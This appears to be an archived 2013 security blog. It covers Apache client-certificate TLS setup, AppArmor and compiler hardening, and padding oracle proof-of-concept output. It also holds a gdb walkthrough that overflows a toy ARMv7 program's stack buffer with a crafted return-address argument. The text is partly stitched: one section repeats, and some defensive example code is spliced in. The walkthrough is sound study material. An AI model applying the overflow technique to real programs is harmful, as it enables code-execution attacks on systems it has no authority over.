Generating RSA private key, 2048 bit long modulus
...+++
.................+++
e is 65537 (0x10001)
Enter pass phrase for server.key:
Verifying - Enter pass phrase for server.key:
--------------------------------------------------------------------------------
Generate the server CSR (Certificate Signing Request) with the server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key server.key -out server.csr
...........................................
........................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
--------------------------------------------------------------------------------
Generate server certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -x509 -days 2048 -key server.key -in server.csr > server.crt
Enter pass phrase for server.key
--------------------------------------------------------------------------------
You can inspect the cert or verify it:
openssl x509 -noout -text -in server.crt
openssl verify -CAfile ca.crt server.crt
Generate client's key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out client.key 2048
Generating RSA private key, 2048 bit long modulus
..........................................................................................................................................+++
........+++
e is 65537 (0x10001)
Enter pass phrase for client.key:
Verifying - Enter pass phrase for client.key:
--------------------------------------------------------------------------------
Client's CSR:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key client.key -out client.csr
.......................................................
..............................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-info.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Generate the client's certificate with the CA's signature:
root@d6-test:/opt/ssl# openssl ca -in client.csr -out client.crt
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
Serial Number:
c0:81:0e:bc:52:d0:19:5c
Validity
Not Before: Nov 19 02:28:13 2013 GMT
Not After : Nov 19 02:28:13 2014 GMT
Subject:
countryName = CN
stateOrProvinceName = Shanghai
organizationName = MOT
organizationalUnitName = MOT
commonName = hardened-shit
emailAddress = info@hardened-info.com
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
A6:A5:D7:7C:C7:A8:C3:24:C7:90:14:76:84:15:43:D0:2C:0C:31:66
X509v3 Authority Key Identifier:
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
Certificate is to be certified until Nov 19 02:28:13 2014 GMT (365 days)
Sign the certificate? [y/n]:y
1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------
Convert to PKCS#12 format, which Firefox can import:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.pfx
Enter pass phrase for client.key:
Enter Export Password:
Verifying - Enter Export Password:
--------------------------------------------------------------------------------
Enable SSL/TLS support in Apache2:
--------------------------------------------------------------------------------
root@hardened-shit:/opt# mv ssl /etc/ssl/hardened-shit
root@hardened-shit:/etc/apache2# a2ensite default-ssl
Enabling site default-ssl.
To activate the new configuration, you need to run:
service apache2 reload
root@hardened-shit:/etc/apache2# a2enmod ssl
Module ssl already enabled
Edit /etc/apache2/sites-enabled/default-ssl:
SSLCertificateFile /etc/ssl/hardened-shit/server.crt
SSLCertificateKeyFile /etc/ssl/hardened-shit/server.key
SSLCertificateChainFile /etc/ssl/hardened-shit/ca.crt
SSLCACertificatePath /etc/ssl/hardened-shit/
SSLCACertificateFile /etc/ssl/hardened-shit/ca.crt
SSLVerifyClient require
SSLVerifyDepth 10
Disable port 80:
root@hardened-shit:/etc/apache2# a2dissite default
--------------------------------------------------------------------------------
Done... it should work.
btw: I highly recommend reading these two articles if you want to know more: Hardening Your Web Server's SSL Ciphers, and TLS Perfect Forward Secrecy support with Apache.
I only enable the secure ciphers:
SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5
SSLProtocol +TLSv1.2 +TLSv1.1
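The whole procedure above as a non-interactive script, added here as an example and not the original post's commands: it builds the CA, issues CA-signed server and client certificates, exports the client's PKCS#12 bundle and runs the chain check that mod_ssl performs on each client certificate when SSLVerifyClient is set to require, including a client certificate from a different CA that must be rejected. It assumes only the openssl CLI; the subject names, the export password and the $WORKDIR scratch directory are constructed placeholders, and unlike the transcript the server certificate is signed by the CA rather than self-signed with `openssl req -x509`, which is what makes `openssl verify -CAfile ca.crt server.crt` succeed.

```shell
#!/bin/sh
# Added example, not the original post's commands: the CA / server / client
# certificate procedure as a script, plus the chain check that mod_ssl performs
# on every client certificate when SSLVerifyClient is "require".
# Assumptions: the openssl CLI is on PATH; WORKDIR, the subject names and the
# PKCS#12 export password are constructed placeholders.
set -eu

WORKDIR="${WORKDIR:-$(mktemp -d)}"
SUBJ="/C=CN/ST=Shanghai/L=Shanghai/O=Example"   # constructed placeholder subject

# Write a minimal openssl config so the result does not depend on the distro's
# openssl.cnf: the CA gets CA:TRUE, the leaf certs get CA:FALSE plus the EKU
# matching how Apache uses them (serverAuth for the server, clientAuth for the client).
write_config() {
    cat > "$1" <<'EOF'
[ req ]
distinguished_name = dn
prompt = no
[ dn ]
# the subject is supplied on the command line with -subj
[ v3_ca ]
basicConstraints = critical,CA:TRUE
keyUsage = critical,keyCertSign,cRLSign
subjectKeyIdentifier = hash
[ v3_server ]
basicConstraints = CA:FALSE
keyUsage = critical,digitalSignature,keyEncipherment
extendedKeyUsage = serverAuth
[ v3_client ]
basicConstraints = CA:FALSE
keyUsage = critical,digitalSignature
extendedKeyUsage = clientAuth
EOF
}

# issue_cert DIR NAME CN EXTSECTION: key + CSR for NAME, then sign the CSR with
# the CA in DIR. This replaces the transcript's `openssl req -x509` for the
# server, which would self-sign it and make `openssl verify -CAfile ca.crt` fail.
issue_cert() {
    openssl req -new -newkey rsa:2048 -nodes -sha256 -config "$1/openssl.cnf" \
        -subj "$SUBJ/CN=$3" -keyout "$1/$2.key" -out "$1/$2.csr"
    openssl x509 -req -sha256 -days 365 -in "$1/$2.csr" \
        -CA "$1/ca.crt" -CAkey "$1/ca.key" -CAcreateserial \
        -extfile "$1/openssl.cnf" -extensions "$4" -out "$1/$2.crt"
}

# make_pki DIR: one CA, one server cert, one client cert and the client's PKCS#12 bundle.
make_pki() {
    mkdir -p "$1"
    write_config "$1/openssl.cnf"
    # The CA certificate is the only self-signed certificate in the set.
    openssl req -x509 -newkey rsa:2048 -nodes -sha256 -days 1095 \
        -config "$1/openssl.cnf" -extensions v3_ca \
        -subj "$SUBJ/CN=Example Root CA" -keyout "$1/ca.key" -out "$1/ca.crt"
    issue_cert "$1" server www.example.test v3_server
    issue_cert "$1" client alice v3_client
    # Same bundle the post builds for Firefox; the export password is a placeholder.
    openssl pkcs12 -export -clcerts -in "$1/client.crt" -inkey "$1/client.key" \
        -out "$1/client.pfx" -passout pass:changeit
}

# verify_cert CAFILE CERT PURPOSE: returns 0 when CERT chains to CAFILE and is
# valid for PURPOSE (sslclient or sslserver). An OpenSSL-based server such as
# mod_ssl verifies the peer certificate with the ssl_client purpose against
# SSLCACertificateFile before letting the client in.
verify_cert() {
    openssl verify -CAfile "$1" -purpose "$3" "$2" >/dev/null 2>&1
}

# cert_cn CERT: the subject CN, the field Apache exposes as SSL_CLIENT_S_DN_CN.
cert_cn() {
    openssl x509 -noout -subject -in "$1" | sed 's/.*CN *= *//'
}

# Demo: build two independent PKIs and check what mod_ssl would check.
make_pki "$WORKDIR/pki"
make_pki "$WORKDIR/other"
verify_cert "$WORKDIR/pki/ca.crt" "$WORKDIR/pki/server.crt" sslserver \
    && echo "server.crt chains to ca.crt"
verify_cert "$WORKDIR/pki/ca.crt" "$WORKDIR/pki/client.crt" sslclient \
    && echo "client.crt for $(cert_cn "$WORKDIR/pki/client.crt") chains to ca.crt"
verify_cert "$WORKDIR/pki/ca.crt" "$WORKDIR/other/client.crt" sslclient \
    || echo "client.crt issued by another CA is rejected, as SSLVerifyClient require would"
```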
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------
Convert to pkcs12 format, which can be identified by firefox:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.pfx
Enter pass phrase for client.key:
Enter Export Password:
Verifying - Enter Export Password:
--------------------------------------------------------------------------------
Enable SSL/TLS support in Apache2:
--------------------------------------------------------------------------------
root@hardened-shit:/opt# mv ssl /etc/ssl/hardened-shit
root@hardened-shit:/etc/apache2# a2ensite default-ssl
Enabling site default-ssl.
To activate the new configuration, you need to run:
service apache2 reload
root@hardened-shit:/etc/apache2# a2enmod ssl
Module ssl already enabled
edit /etc/apache2/sites-enabled/default-ssl:
SSLCertificateFile /etc/ssl/hardened-shit/server.crt
SSLCertificateKeyFile /etc/ssl/hardened-shit/server.key
SSLCertificateChainFile /etc/ssl/hardened-shit/ca.crt
SSLCACertificatePath /etc/ssl/hardened-shit/
SSLCACertificateFile /etc/ssl/hardened-shit/ca.crt
SSLVerifyClient require
SSLVerifyDepth 10
Disable port 80:
root@hardened-shit:/etc/apache2# a2dissite default
--------------------------------------------------------------------------------
Done....it should work.
btw: I highly recommend reading these two articles if you want to know more: Hardening Your Web Server's SSL Ciphers, and TLS Perfect Forward Secrecy support with Apache
I only enable secure ciphers:
SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5
SSLProtocol +TLSv1.2 +TLSv1.1
Thursday, November 21, 2013
Hello, stack bufferoverflow on Debian ARMv7
I haven't made my hands *dirty* for a long time, since I stopped at io-wargame lvl11. As we all know, ARM architectures are becoming sec guys' daily bread. I think it's time to begin my journey to explore the diff between ARMv7 and x86/x64 out there. It would be good to build a testing environment in the pre-adventure stage. Debian has been supporting ARMv7 for a while. You can follow this great article to install a Debian GNU/Linux for ARMv7( armhf) distro. After the installation, you probably want to configure a NAT network between the host and the qemu guest. Or just use my network config.
To figure out the memory layout is a good starting point. Take a glance at the code at 1st, plz.....
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q
Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x00008448 <+0>: push {r7, lr}
0x0000844a <+2>: sub sp, #8
0x0000844c <+4>: add r7, sp, #0
0x0000844e <+6>: str r0, [r7, #4]
0x00008450 <+8>: str r1, [r7, #0]
0x00008452 <+10>: movw r3, #34040 ; 0x84f8
0x00008456 <+14>: movt r3, #0
0x0000845a <+18>: mov r0, r3
0x0000845c <+20>: movw r1, #33797 ; 0x8405
0x00008460 <+24>: movt r1, #0
0x00008464 <+28>: movw r2, #33845 ; 0x8435
0x00008468 <+32>: movt r2, #0
0x0000846c <+36>: blx 0x8340
0x00008470 <+40>: ldr r3, [r7, #0]
0x00008472 <+42>: add.w r3, r3, #4
0x00008476 <+46>: ldr r3, [r3, #0]
0x00008478 <+48>: mov r0, r3
0x0000847a <+50>: bl 0x8404
0x0000847e <+54>: mov.w r3, #0 ==> 0x0000847e should be the return address of test()
0x00008482 <+58>: mov r0, r3
0x00008484 <+60>: add.w r7, r7, #8
0x00008488 <+64>: mov sp, r7
0x0000848a <+66>: pop {r7, pc}
End of assembler dump.
(gdb) disassemble fuck_me
Dump of assembler code for function fuck_me:
0x00008434 <+0>: push {r7, lr} ===> Use 0x00008434 to overwrite test()'s ret addr
0x00008436 <+2>: add r7, sp, #0
0x00008438 <+4>: movw r0, #34024 ; 0x84e8
0x0000843c <+8>: movt r0, #0
0x00008440 <+12>: blx 0x8358
0x00008444 <+16>: pop {r7, pc}
End of assembler dump.
Let's check the memory layout:
(gdb) b test
Breakpoint 1 at 0x840c: file victim.c, line 11.
(gdb) r AAAABBBB
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11
11 strcpy(buf, input);
(gdb) n
12 printf("%s \n", buf);
(gdb)
AAAABBBB
13 }
(gdb) x/12x $sp
0x7efff658: 0x00000000 0x7efff919 0x000084f8 0x41414141
0x7efff668: 0x42424242 0x00008400 0x7efff678 0x0000847f==> ret addr of test()
0x7efff678: 0x7efff7d4 0x00000002 0x00000000 0x76f12cfb
So the layout should be like this:
[high addr]...[buf:..16-byte...][Return addr]...[low addr]
Why the hell did the addr 0x0000847e we saw above become 0x0000847f? Weird...Anyone know what happened?
OK, let's try our 1st exp:
(gdb) r `python -c 'print "A" * 16 + "\x34\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A', "4\204") at victim.c:11
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA4�
Program received signal SIGILL, Illegal instruction.
fuck_me () at victim.c:17
17 printf("being hacked\n");
(gdb) n
Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.
Did you see this? Add 1 to fuck_me()'s addr, plz.....
(gdb) r `python -c 'print "A" * 16 + "\x35\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A', "5\204") at victim.c:11
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA5�
being hacked
Program received signal SIGSEGV, Segmentation fault.
0x00008432 in test (input=) at victim.c:13
13 }
It worked! So, the exp should be like:
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
AAAAAAAAAAAAAAAA5�
being hacked
Segmentation fault
===========================
I guess exploitation on ARM would be much different from x86. I've heard that ret2libc won't work on ARM. That's really interesting and worth figuring out. Obviously, this Phrack paper and some manuals should be added to my must-read list.
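As an added example (not the blog's victim.c, which the post does not show), the strcpy() pattern from the gdb session is reconstructed beside a bounded copy, plus a small helper for the ARM Thumb state bit that accounts for the 0x847e/0x847f difference and the SIGILL seen above. test_input, copy_bounded, is_thumb_address and code_address are this example's own names.

```c
/* Added example, not the post's victim.c. The unchecked copy is reconstructed
 * from the gdb session (16-byte stack buffer filled by strcpy() from argv[1]);
 * the bounded copy and the Thumb-bit helpers are this example's own additions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16

/* The pattern the post overflows: no length check, so an argument of 16 or
 * more bytes runs past buf into the saved r7/lr slots that "x/12x $sp"
 * showed right after it. */
static void copy_unchecked(char *dst, const char *src) {
    strcpy(dst, src);                       /* overflows when strlen(src) >= BUF_SIZE */
}

/* Hardened variant: refuse anything that does not fit and always NUL-terminate.
 * Returns 0 on success, -1 when the input would have overflowed. */
static int copy_bounded(char *dst, size_t dst_size, const char *src) {
    size_t len = strlen(src);
    if (dst_size == 0) return -1;
    if (len >= dst_size) {                  /* no room for the trailing NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Mirrors the post's test(): copy the input into a 16-byte local buffer and
 * print it. "safe" selects the bounded copy. Returns the bounded copy's status
 * (the unchecked path has no error signal at all, which is the point). */
int test_input(const char *input, int safe) {
    char buf[BUF_SIZE];
    int rc = 0;
    if (safe)
        rc = copy_bounded(buf, sizeof buf, input);
    else
        copy_unchecked(buf, input);
    printf("%s \n", buf);
    return rc;
}

/* On ARM, bit 0 of a branch target used by BX/BLX/pop {pc} selects the
 * instruction set: 1 = Thumb, 0 = ARM. That is why the bl at 0x847a saved
 * lr = 0x847f (return to Thumb code at 0x847e) and why returning to 0x8434
 * instead of 0x8435 raised SIGILL: the Thumb-encoded fuck_me() was executed
 * in ARM state. */
int is_thumb_address(uint32_t addr) {
    return (int)(addr & 1u);
}

/* Strip the state bit to recover the instruction address gdb displays. */
uint32_t code_address(uint32_t addr) {
    return addr & ~1u;
}

int main(int argc, char **argv) {
    const char *input = argc > 1 ? argv[1] : "AAAABBBB";
    /* Only the bounded path is exercised here; the unchecked one exists for
     * contrast. Building with -fstack-protector-all would also abort the
     * unchecked path on overflow instead of returning into a chosen address. */
    if (test_input(input, 1) != 0)
        fprintf(stderr, "input rejected: longer than %d bytes\n", BUF_SIZE - 1);
    printf("lr 0x847f -> code at 0x%x, thumb=%d\n",
           code_address(0x847f), is_thumb_address(0x847f));
    return 0;
}
```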
Thursday, October 17, 2013
RTL-SDR version of "Hello World"
Telco sec has always been a fascinating field I wanted to get involved with. Why? Because those old school Phrack guys have been playing with both computer sec and telco sec. I missed the golden age of Phrack, which bothered me for a while. It won't stop me from diving into any field I want now. If what makes you tick is only profit( money?), come on, you probably aren't qualified to mention the term "underground spirit";-)
About 1 month ago, a friend( Can't list his/her name here-_-) sent me a slide deck about Femtocell hacking and asked if I might be interested in it. Of course, I am. But...well, there's always a fucking "but", isn't there?...femtocells are a little bit expensive and I was busy with other stuff at the time. Then I even forgot this shit until a great hacker( Can't list his/her name either-_-) mentioned that there are cheap devices I could buy for learning telco stuff: RTL-SDR. Everything you need to know is already on this website. I bought a tuner, antenna, freq counter, SMA-MCX converter, etc... then I was catching the shit in the air. FM at first, then MODE-S transmissions and GSM sniffing. What I have learned/done in the past two weeks has really shocked my mind and it has definitely activated a bunch of neurons in my brain. This is an awesome field. I'm willing to keep up with it in the future. Hacking on GNU/Linux system calls and the kernel is already a burden that's hard to carry. Hope I can make it this time.............I really appreciate those who have contributed/are contributing to Phrack. It's more than a technical ezine. It's about hacking spirit and philosophical ideas.
Freq counter, it probably could be detecting IR-based controller
Catching the shit in the air( not the wire)
Wednesday, May 22, 2013
How to Harden your own program in GNU/Linux
Platform: OpenSUSE 12.3
AppArmor is an implementation of confinement technology. It can help you defend against unknown attacks like 0-day vulnerabilities. In openSUSE/Ubuntu, it's very easy to install. For openSUSE 12.3, typing "yast2" in a terminal or using the GUI software management can install AppArmor. Once you have installed AppArmor, you need to make a profile for the program you want to harden.
Firstly, please download the example files here. Then compile the program:
shawn@linux-sk8j:~> gcc apparmor_test.c
Generate the profile for your program:
shawn@linux-sk8j:~> sudo /usr/sbin/genprof a.out
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
.........................................
.........................................
.........................................
Finished generating profile for /home/shawn/a.out.
-----------------------------------------------------------
Then you can find the profile in /etc/apparmor.d/home.shawn.a.out. Add a few lines to it like this:
#include <tunables/global>
/home/shawn/a.out {
  #include <abstractions/base>
  /home/shawn/a.out mr,
  /home/shawn/hello r,
  /home/shawn/world w,
  network stream,
}
AppArmor uses a whitelist-like policy by default, so the above profile means: this program( a.out) is only allowed read permission on the file /home/shawn/hello, write permission on the file /home/shawn/world, and stream (TCP) network connections. If this program has a stack-based buffer overflow, an attacker might try to spawn a shell by exploiting it; under this profile, that's not going to happen. For further reading about AppArmor profiles, you might be interested in this article. Other similar implementations like SELinux and Grsecurity/PaX can achieve the same goal. SELinux is the most powerful one but also the most difficult to use.
When you are done with the confinement hardening, there are a lot of mitigation technologies you should also consider. They are much easier to use. Please keep this in mind: these defensive technologies are what we call "mitigations", which means skilled hackers or attackers still have the ability to get past them. It's only a matter of time.
GCC options:
------------------------------------------------
Stack canary:
-fstack-protector, only some functions are protected
-fstack-protector-all, protects every function in your program
Bypass method, please check Scraps of notes on remote stack overflow exploitation in Phrack Issue 67.
Heap( malloc() corruption check):
default since glibc 2.5. Please use the latest version of glibc.
Position-Independent-Executable:
-fPIE -pie, so the executable can take advantage of the ASLR provided by the kernel. Remember to turn on your ASLR.
Bypass method, please check Bypassing PaX ASLR protection in Phrack Issue 59. Yes, it's an old paper but it's still worth reading.
GOT memory corruption attack hardening of ELF binaries:
-z relro, Partial RELRO
-z relro -z now, Full RELRO
Bypass method, please check The Art Of ELF: Analysis and Exploitations
String vulnerability mitigation:
-D_FORTIFY_SOURCE=2 (needs optimization, -O1 or higher), mitigates format string vulns
Bypass method, please check A Eulogy for Format Strings in Phrack Issue 67.
Non-executable stack:
-z noexecstack
Well, there are a lot of ways to bypass it.
I also made a list a few months ago. You may want to check it too. Yes, there are a lot of mitigation techs and a lot of bypass techs. Offensive and defensive technologies are like brothers. The only thing is, they will fight each other to the end of the world;-)
btw: You don't need to worry about the performance hit when you turn on these mitigation techs, except -fstack-protector-all. That's it!
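As an added example that is not part of the post, here is a small checksec-style inspector in C for the link-time options listed above (PIE, -z noexecstack, -z relro and -z now), so you can verify that a binary was actually built with them. check_elf and build_elf are this example's own names; it assumes a little-endian host and an ELF64 binary.

```c
/* Added example, not code from the post: a checksec-style inspector for an ELF64
 * image, reporting whether a binary was linked with the options listed above:
 * PIE (-fPIE -pie), a non-executable stack (-z noexecstack) and partial or full
 * RELRO (-z relro / -z relro -z now).  Struct layouts and tag values follow the
 * ELF64 ABI and GNU extensions, so <elf.h> is not needed; little-endian host assumed. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { ET_EXEC = 2, ET_DYN = 3, PT_DYNAMIC = 2, PF_X = 1, PF_W = 2, PF_R = 4,
       PT_GNU_STACK = 0x6474e551, PT_GNU_RELRO = 0x6474e552,
       DT_NULL = 0, DT_BIND_NOW = 24, DT_FLAGS = 30, DF_BIND_NOW = 8,
       DT_FLAGS_1 = 0x6ffffffb, DF_1_NOW = 1 };

typedef struct {                                    /* Elf64_Ehdr, 64 bytes */
    uint8_t e_ident[16]; uint16_t e_type, e_machine; uint32_t e_version;
    uint64_t e_entry, e_phoff, e_shoff; uint32_t e_flags;
    uint16_t e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx;
} Ehdr;
typedef struct {                                    /* Elf64_Phdr, 56 bytes */
    uint32_t p_type, p_flags;
    uint64_t p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align;
} Phdr;
typedef struct { int64_t d_tag; uint64_t d_val; } Dyn;   /* Elf64_Dyn, 16 bytes */

/* relro: 0 = none, 1 = partial (PT_GNU_RELRO only), 2 = full (RELRO + BIND_NOW) */
typedef struct { int valid, pie, nx_stack, relro; } Checks;

Checks check_elf(const uint8_t *img, size_t len) {
    Checks c = {0, 0, 0, 0};
    Ehdr eh;
    int have_relro = 0, bind_now = 0;
    if (len < sizeof eh) return c;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, "\x7f" "ELF", 4) != 0 || eh.e_ident[4] != 2) return c; /* ELFCLASS64 only */
    c.valid = 1;
    c.pie = (eh.e_type == ET_DYN);                  /* an ET_DYN executable is a PIE */
    for (uint16_t i = 0; i < eh.e_phnum; i++) {
        Phdr ph;
        uint64_t off = eh.e_phoff + (uint64_t)i * sizeof ph;
        if (off + sizeof ph > len) break;
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type == PT_GNU_STACK) c.nx_stack = !(ph.p_flags & PF_X); /* missing header = executable */
        if (ph.p_type == PT_GNU_RELRO) have_relro = 1;
        if (ph.p_type != PT_DYNAMIC) continue;
        uint64_t end = ph.p_offset + ph.p_filesz < len ? ph.p_offset + ph.p_filesz : len;
        for (uint64_t d = ph.p_offset; d + sizeof(Dyn) <= end; d += sizeof(Dyn)) {
            Dyn dy;
            memcpy(&dy, img + d, sizeof dy);
            if (dy.d_tag == DT_NULL) break;
            if (dy.d_tag == DT_BIND_NOW) bind_now = 1;                       /* what -z now emits */
            if (dy.d_tag == DT_FLAGS && (dy.d_val & DF_BIND_NOW)) bind_now = 1;
            if (dy.d_tag == DT_FLAGS_1 && (dy.d_val & DF_1_NOW)) bind_now = 1;
        }
    }
    if (have_relro) c.relro = bind_now ? 2 : 1;     /* -z now without -z relro is not "full" */
    return c;
}

/* Build a synthetic ELF64 image with just the headers the checker reads, so the
 * logic can be exercised without a real binary.  Returns the image length. */
size_t build_elf(uint8_t *out, size_t cap, int pie, int nx, int relro, int now) {
    Ehdr eh; Phdr ph[3]; Dyn dyn[2];
    int nph = relro ? 3 : 2;
    size_t phoff = sizeof eh, dynoff = phoff + nph * sizeof(Phdr), total = dynoff + sizeof dyn;
    if (cap < total) return 0;
    memset(&eh, 0, sizeof eh); memset(ph, 0, sizeof ph); memset(dyn, 0, sizeof dyn);
    memcpy(eh.e_ident, "\x7f" "ELF\x02\x01\x01", 7);   /* magic, ELFCLASS64, little-endian, v1 */
    eh.e_type = pie ? ET_DYN : ET_EXEC; eh.e_machine = 62; eh.e_version = 1;   /* 62 = x86-64 */
    eh.e_phoff = phoff; eh.e_ehsize = sizeof eh; eh.e_phentsize = sizeof(Phdr); eh.e_phnum = nph;
    ph[0].p_type = PT_DYNAMIC; ph[0].p_flags = PF_R | PF_W;
    ph[0].p_offset = dynoff; ph[0].p_filesz = ph[0].p_memsz = sizeof dyn;
    ph[1].p_type = PT_GNU_STACK; ph[1].p_flags = PF_R | PF_W | (nx ? 0 : PF_X);
    if (relro) { ph[2].p_type = PT_GNU_RELRO; ph[2].p_flags = PF_R; }
    dyn[0].d_tag = DT_FLAGS; dyn[0].d_val = now ? DF_BIND_NOW : 0;
    dyn[1].d_tag = DT_NULL;
    memcpy(out, &eh, sizeof eh);
    memcpy(out + phoff, ph, nph * sizeof(Phdr));
    memcpy(out + dynoff, dyn, sizeof dyn);
    return total;
}

/* Stand-alone use: inspect a real binary (default: the running program itself). */
int main(int argc, char **argv) {
    const char *path = argc > 1 ? argv[1] : "/proc/self/exe";
    static const char *names[] = {"none", "partial", "full"};
    FILE *f = fopen(path, "rb");
    if (!f) { perror(path); return 1; }
    fseek(f, 0, SEEK_END); long n = ftell(f); rewind(f);
    uint8_t *img = malloc(n > 0 ? (size_t)n : 1);
    size_t got = img ? fread(img, 1, (size_t)(n > 0 ? n : 0), f) : 0;
    fclose(f);
    Checks c = check_elf(img, got);
    printf("%s: ELF64=%d PIE=%d NX-stack=%d RELRO=%s\n", path, c.valid, c.pie, c.nx_stack, names[c.relro]);
    free(img);
    return 0;
}
```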
May L0rd's hacking spirit guide us!!!
Friday, April 26, 2013
Padding Oracle Attack PoC in C
I'm a newbie in the crypto field. *Unfortunately*, I need to deal with some open source security stuff( openssl and gnutls) in my day job. Yes, don't be so sad for me;-) I can handle it so far. I need to know more about crypto. The best way to do it is writing xxx-attack PoCs. Then I heard that Lucky-13 is something. Backporting these patches from upstream drove me crazy. Dude, you know~ 13 openssl upstream commits( more than 1,700 loc modified) were only for fixing one security issue called Lucky Thirteen, which was disclosed in Feb 2013. It was my honor to do this shitload of work with a very very low salary;-) After I finished it, a very serious question came to my mind: What if another ten shitloads of work pop up in the future but with no help from the upstream community? Well...I have to eat the rocket with my own hands. F0r preparing to handle such a situation, I need to know the details of the attack. That's why I wrote the padding oracle attack PoC( Download here). I googled "padding oracle attack". I found 3 guys who wrote their own padding oracle attack PoCs/tools in 3 different languages: perl, ruby and python. I looked at their code and articles. These guys are awesome!
Brian Holyfield( Perl guy) wrote this very good article and more importantly it's easy to understand: http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html
Daoge( python one) is a Chinese hacker who is good at web security: http://hi.baidu.com/aullik5/item/49ab45de982a67db251f40f6
Ron Bowes( Ruby guy) gave us a great presentation at Shmoocon 2013. I really thank him for his practical advice. He wrote two articles about padding oracle attacks. The 1st one introduces the principle and the 2nd gives a great example. http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth http://www.skullsecurity.org/blog/2013/a-padding-oracle-example
Well, I'm kind of an old school guy. I decided to write it in C( not old enough as asm).
This example is simple:
shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ make
gcc -g -o padding_oracle_attack_poc padding_oracle_attack_poc.c -lcrypto
done
shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ ./padding_oracle_attack_poc
Ciphertext is 16 bytes: 83e10d51e6d122ca3faf089c7a924a7b
Decrypting now
205 is done: 00000000000000ce3faf089c7a924a7b
36 is done: 00000000000025cd3faf089c7a924a7b
214 is done: 0000000000d724cc3faf089c7a924a7b
230 is done: 00000000e7d023cb3faf089c7a924a7b
80 is done: 00000051e6d122ca3faf089c7a924a7b
110 is done: 00006f52e5d221c93faf089c7a924a7b
137 is done: 008a6e53e4d320c83faf089c7a924a7b
248 is done: f985615cebdc2fc73faf089c7a924a7b
The original plaintext is: "Hello World"
The one last block of plaintext: 726c6405050505050000000000000000 ----> rld
btw: Thanks to Thomas Biege again..who is guiding me in not only one sec field...
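An added example, not the post's PoC: the PKCS#7 padding check that a padding oracle leans on, in its naive form beside a constant-time form, using the post's own last block ("Hello World" followed by five 0x05 bytes) as constructed sample input. unpad_naive, unpad_ct and the "work" counters are this example's own names; the counters are instrumentation to make the leak measurable, not part of any real implementation.

```c
/* Added example, not the post's padding_oracle_attack_poc.c.  The naive unpad
 * stops at the first bad byte and returns a distinct error, so both its running
 * time and its error code tell a remote party where the padding broke; that is
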